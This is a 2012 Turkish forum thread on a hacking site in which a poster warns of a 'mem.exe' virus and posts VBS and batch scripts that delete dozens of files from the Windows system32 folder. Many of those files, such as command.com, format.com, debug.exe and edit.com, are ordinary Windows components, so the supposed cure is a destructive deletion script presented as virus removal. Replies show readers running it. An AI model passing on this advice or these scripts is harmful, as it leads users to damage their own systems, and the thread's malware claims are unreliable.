THT DUYURU

chat
Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

ugursuz reklam
takipci
Seçenekler

mem.exe virüsüne dikkat

hajking - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
01/2012
Nereden:
İstanbul
Yaş:
23
Mesajlar:
774
Konular:
26
Teşekkür (Etti):
7
Teşekkür (Aldı):
95
Ticaret:
(0) %
25
2446
06-08-2012 12:58
#1
Arkadaşlar bugün pcimde bir şey fark ettim mem.exe adında bi virüs yemişim nasıl anladım şöyle system32 de gezinirken gözüme acayip exe dosyaları takıldı mem.exe fastopen.exe vs...
bu dosyaların üzerinde mouse oynatınca hani dosyanın üstünde mouse oynatırsın dosya sürümü şirket adı fln çıkarya onlar yoktu yani system dosyası olsa microsoft fln diye yazardı bunda bi tek dosya boyutu yazıyodu neyse baya araştırınca bunun gerçektende virüsü olduğunu anladım bu crypt lı bi virüs mcafee falan tanımadı eset kullanıyodum dosyayı yollamama izin vermiyodu sonra bun çözümünü ne antivirüs sitesinde nede diğer yapandı forum sitelerinde buldum dosyauzantısı adında bir sitede bi vatandaşın yaptığı yorumda çözümü işle birlikte yazmışlar yani tek ben değilmişim ne neyse arkadaşlar çözümü çok basit
Kod:
on error resume next
set file = createobject("Scripting.FileSystemObject")
file.DeleteFile "C:\windows\system32\mem.exe"
file.DeleteFile "C:\windows\system32\mem.pif"
file.DeleteFile "C:\windows\system32\mem.PIF"
file.DeleteFile "C:\windows\system32\mmtask.tsk"
file.DeleteFile "C:\windows\system32\msctfime.ime"
file.DeleteFile "C:\windows\system32\nw16.exe"
file.DeleteFile "C:\windows\system32\redir.exe"
file.DeleteFile "C:\windows\system32\share.exe"
file.DeleteFile "C:\windows\system32\shfolder.inf"
file.DeleteFile "C:\windows\system32\v7vga.rom"
file.DeleteFile "C:\windows\system32\vwipxspx.exe"
file.DeleteFile "C:\windows\system32\chcp.com"
file.DeleteFile "C:\windows\system32\chcfg.exe"
file.DeleteFile "C:\windows\system32\command.com"
file.DeleteFile "C:\windows\system32\debug.exe"
file.DeleteFile "C:\windows\system32\diskcomp.com"
file.DeleteFile "C:\windows\system32\diskcopy.com"
file.DeleteFile "C:\windows\system32\dosx.exe"
file.DeleteFile "C:\windows\system32\wlcomm.exe"
file.DeleteFile "C:\windows\system32\edlin.exe"
file.DeleteFile "C:\windows\system32\edit.com"
file.DeleteFile "C:\windows\system32\fastopen.exe"
file.DeleteFile "C:\windows\system32\format.com"
file.DeleteFile "C:\windows\system32\graphics.com"
file.DeleteFile "C:\windows\system32\graftabl.com"
file.DeleteFile "C:\windows\system32\keyboard.sys"
file.DeleteFile "C:\windows\system32\nlsfunc.exe"
file.DeleteFile "C:\windows\system32\append.exe"
file.DeleteFile "C:\windows\system32\exe2bin.exe"
file.DeleteFile "C:\windows\system32\imjpinst.exe"
file.DeleteFile "C:\windows\system32\imscinst.exe"
file.DeleteFile "C:\windows\system32\mscdexnt.exe"
file.DeleteFile "C:\windows\system32\nlsfunc.exe"
file.DeleteFile "C:\windows\system32\pintlphr.exe"
file.DeleteFile "C:\windows\system32\vwipxspx.exe"
file.DeleteFile "C:\windows\system32\wmptour.hta"
file.DeleteFile "C:\windows\system32\Eset_TrialReset_serv.exe"
file.DeleteFile "C:\windows\system32\Cleanup.exe"
ya bunu notepade farklı kaydet yapıp uzantısını vbs yapın da çalıştırın

yada

Kod:
del mem.exe
del mem.pif
del mem.PIF
del mmtask.tsk
del msctfime.ime
del nw16.exe
del redir.exe
del share.exe
del shfolder.inf
del v7vga.rom
del vwipxspx.exe
del chcp.com
del ChCfg.exe
del command.com
del debug.exe
del diskcomp.com
del diskcopy.com
del dosx.exe
del wlcomm.exe
del edlin.exe
del edit.com
del fastopen.exe
del format.com
del graphics.com
del graftabl.com
del keyboard.sys
del nlsfunc.exe
del append.exe
del exe2bin.exe
del imjpinst.exe
del imscinst.exe
del mscdexnt.exe
del nlsfunc.exe
del pintlphr.exe
del vwipxspx.exe
del wmptour.hta
del Eset_TrialReset_serv.exe
del Cleanup.exe
bunun uzantısını .bat yapın

not: bunların işe yaraması için virüslü bilgisayarı güvenli modda açıp .bat yada .vbs uzantılı dosyayı system32 klasörünün içine atıpta çalıştırın
arkadaşlar unutmayın ki bu cryptlı bi virüs en iyi antivirüs bile tanımadı şuanda tek yol bu
teşekkürü çok görmeyin
|~Hérmés~|, oguz454 Teşekkür etti.
del piero - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2012
Nereden:
Evden :)
Mesajlar:
118
Konular:
6
Teşekkür (Etti):
36
Teşekkür (Aldı):
11
Ticaret:
(0) %
06-08-2012 13:05
#2
teşekkürler bizde dikkat edelim
---------------------
Notre Dame' ın Hacker' i
hajking - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
01/2012
Nereden:
İstanbul
Yaş:
23
Mesajlar:
774
Konular:
26
Teşekkür (Etti):
7
Teşekkür (Aldı):
95
Ticaret:
(0) %
06-08-2012 13:13
#3
system32 de belittiğim dosyalar varmı bak çünkü gerçekten ben yani bu güne kadar anlamadım bunların pcmde olduğunu
oguz454 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2012
Mesajlar:
10
Konular:
0
Teşekkür (Etti):
6
Teşekkür (Aldı):
0
Ticaret:
(0) %
06-08-2012 14:36
#4
yardım edin bende nerdeyse hepsi vardı güvenli modda hem vbs uzantılı hemde bat uzantılı yaptım hiç ibiri silinmedi acaba virüs etkinliğini kaybetmişmidir
aynısınıı arkime söyledim oda aynısı
METEOUR - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
06/2012
Nereden:
Elazığ
Mesajlar:
70
Konular:
4
Teşekkür (Etti):
0
Teşekkür (Aldı):
2
Ticaret:
(0) %
06-08-2012 14:45
#5
Hacı geçen sefer ezik bir .bat yedim(ESET in allah belasını versin)Tüm system32 silindi.
--------------------- ''Bu hayatta yaptırmak istediklerinin adını iyilik koymuşlar''




---------------H4CK3D By M3T30UR-------------

Facebook Profilhttp://www.facebook.com/Legend785
del piero - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2012
Nereden:
Evden :)
Mesajlar:
118
Konular:
6
Teşekkür (Etti):
36
Teşekkür (Aldı):
11
Ticaret:
(0) %
06-08-2012 14:45
#6
baktım yok temiz
---------------------
Notre Dame' ın Hacker' i
macgyver - ait Kullanıcı Resmi (Avatar)
Hevesli Üye
Üyelik tarihi:
07/2012
Mesajlar:
2.866
Konular:
93
Teşekkür (Etti):
247
Teşekkür (Aldı):
434
Ticaret:
(0) %
06-08-2012 14:48
#7
bende var kısayolu ile birlikte eyw hacı...
--------------------- Ben iyi bir adam olamadım ama kimsenin de adamı olmadım!
oguz454 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2012
Mesajlar:
10
Konular:
0
Teşekkür (Etti):
6
Teşekkür (Aldı):
0
Ticaret:
(0) %
06-08-2012 14:49
#8
yardım edin bende var ama silinmio dneddim okodlarla güvenli modda normal modda yok
hajking - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
01/2012
Nereden:
İstanbul
Yaş:
23
Mesajlar:
774
Konular:
26
Teşekkür (Etti):
7
Teşekkür (Aldı):
95
Ticaret:
(0) %
06-08-2012 14:50
#9
Alıntı:
oguz454´isimli üyeden Alıntı Mesajı göster
yardım edin bende nerdeyse hepsi vardı güvenli modda hem vbs uzantılı hemde bat uzantılı yaptım hiç ibiri silinmedi acaba virüs etkinliğini kaybetmişmidir
aynısınıı arkime söyledim oda aynısı
güvenli modda çalıştırdın ve olmadımı
oguz454 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2012
Mesajlar:
10
Konular:
0
Teşekkür (Etti):
6
Teşekkür (Aldı):
0
Ticaret:
(0) %
06-08-2012 14:56
#10
Alıntı:
hajking´isimli üyeden Alıntı Mesajı göster
güvenli modda çalıştırdın ve olmadımı
evet hem normal hem güvenli mod

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler